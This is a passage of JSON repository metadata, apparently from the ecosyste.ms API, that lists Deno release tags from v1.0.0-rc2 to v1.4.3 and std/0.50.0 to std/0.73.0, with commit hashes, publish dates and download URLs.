oad.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed